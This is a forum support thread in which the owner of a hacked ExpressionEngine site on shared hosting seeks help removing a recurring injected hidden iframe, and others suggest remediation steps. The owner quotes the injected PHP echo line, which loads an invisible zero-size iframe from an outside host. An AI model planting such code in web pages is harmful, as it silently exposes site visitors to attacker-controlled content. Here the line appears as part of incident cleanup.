Thread

A site ive built seems to have been hacked, and an iframe is being inserted into the top of the code.
After a search of the forum, i checked the path.php file and found the following code

echo "<iframe src=\"http://svjazka.com/vlov/index.php\" width=0 height=0 style=\"visibility:hidden;position:absolute\"></iframe>";

I removed it yesterday and changed my ftp password.
Ive checked this morning and the same code is back.

I have contacted the host, who havent come back to me yet.
Id appreciate any help with this.

Your host should be able to give you information on how the files are modified.

• If it’s a security issue on the server itself and another user can manipulate your files it’s out of your control to prevent access.
• The hackers may as well have planted a backdoor (usually some PHP shell) in your account that gives them access through HTTP so you should check for any other files that were created or modified around the date of the attack.
• Your computer may be affected by a virus/trojan/rootkit or whatever and the attacker repeatedly get your FTP-password.

More advice from EE tech support will follow soon, I’m sure.

Thanks for the assist, silenz.

cultivate:

  Thanks for reporting this. We take security very seriously and will do our best to work with you on figuring out what’s going on. To that, we need some additional information from you…

  1. EE version and build (found at the bottom of your control panel)
  2. Other scripts on your account, whether in use or not (phpBB, etc…)*

  * If this is a shared hosting environment, the host can make a determination if the attack came through scripts on another account on the server, which is commonly the case with these types of hacks.

  While we work through this, please check through these files:

  * path.php
  * config.php
  * index.php

  to ensure that there is no unusual code such as iFrames or Javascript includes; if you do find that code, then please back-up the file and remove said code.  If you are unsure of what does or doesn’t belong in these files, do not hesitate to ask.

  You may also wish to refresh your files by following the build update instructions.

  Also please ensure that you report this to your host immediately as they can help identify where the attack originated from so that steps can be taken to prevent this in the future.

Thanks for the replies.

@sue
EE Version is 1.6.8 Build:  20090723
I dont know of any scripts running on the account other than those that are used to run expression engine

There doesn’t seem to be anything in the config.php or index.php files, but there was the code i posted above in the path.php file, which i have removed.

I have contacted my hosting about this, but haven’t had a reply yet.

Let us know what you find out. You could also take this time to upgrade to the most recent EE1.6.8 build.

Ive finally had a reply from my host (dreamhost).
They have found that 4 user accounts have been accessed from more than 1 IP address, indicating a password intrusion.
I have followed their steps, changing user passwords, switching from ftp to sftp, removing unused user accounts, updating web software.

The iframe had been added again since this morning, this time in 2 places. Ive removed them both again, and will recheck in the morning to see if the steps ive taken have solved the issue.

Please keep us posted, and do make sure that all users with control panel access have their passwords changed just to be safe.

It seems what every avenue the hacker is using is still open as the site, along with a second one, has an iframe inserted again.
This only seems to be affecting expression engines sites on the dreamhost server. I also host wordpress sites on the same server which seem to be uninfected.

Any help appreciated.

I’d change hosting companies. Personally, I recommend EngineHosting. But there are a number of quality hosts out there that will work just fine.